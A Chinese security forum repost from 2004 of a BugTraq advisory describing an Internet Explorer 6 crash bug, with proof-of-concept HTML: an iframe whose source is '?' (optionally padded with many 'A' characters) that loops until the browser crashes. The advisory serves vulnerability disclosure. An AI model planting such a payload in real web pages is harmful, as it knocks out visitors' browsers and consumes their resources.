枫林在线论坛>>信息安全 [管理模式] [快速回复] [推荐给朋友] |
[187723] 主题: Internet Explorer 6 - Crash (转载) |
作者: tshxp. | 标题: Internet Explorer 6 - Crash (转载)[转载] | |
昵称: tshxp. | 来自: 202.194.*.* | |
经验值: 0 | 发贴时间: 2004年04月09日 21:03:51 | |
等级: 新手上路 | 长度: 2619字 | |
发信人:tshxp@smth.org (I'll be back),信区:cn.bbs.comp.security 标 题:Internet Explorer 6 - Crash (转载) 发信站:BBS 水木清华站 转信站:LeafOK!netnews.sdu.edu.cn!news.happynet.org!maily.cic.tsinghua.edu.c n!SMTH 【 以下文字转载自 BugTraqML 讨论区 】 发信人: me@cipher.org.uk ("E.Kellinis"), 信区: BugTraqML 标 题: Internet Explorer 6 - Crash 发信站: NCTU CSIE FreeBSD Server (Thu Apr 8 08:39:18 2004) 转信站: SMTH!maily.cic.tsinghua.edu.cn!sjc70.webusenet.com!news.usenetserver .co 出 处: freebsd.csie.nctu.edu.tw Formal Report ######################################### Application: Internet Explorer Vendors: http://www.microsoft.com Version: 6.0.2800 Platforms: Windows Bug: Crash(D.O.S) Risk: Low Exploitation: Local with browser Date: 7 Apr 2004 Author: Emmanouel Kellinis e-mail: me@cipher(dot)org(dot)uk web: http://www.cipher.org.uk List : BugTraq(SecurityFocus) ######################################### ======= Product ======= A popular Web browser, created by Microsoft, used to view pages on the World Wide Web. === Bug === Iframe element(TAG) creates an inline frame that contains another document. If you use the character '?' as the document , Internet explorer starts an infinite loop of IFrames inside Iframes , this causes IE's crash. ===================== Proof Of Concept Code ===================== Create a web page and you add an IFRAME which points to --> ? Example : < iframe src= " ? " > Crashes completely IE 6 in about 20 secs and consumes more than 24 MBs of RAM and uses 99% of the CPU power. Additionally, memory consumption and Crashing time can vary , depending on how many characters you add after the '?' character. < iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA " > Emmanouel Kellinis http://www.cipher.org.uk ========================================================= *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt ========================================================= |
========== * * * * * ==========
Top |
Copyright © 2001-2012 枫林在线(www.FengLin.info) All Rights Reserved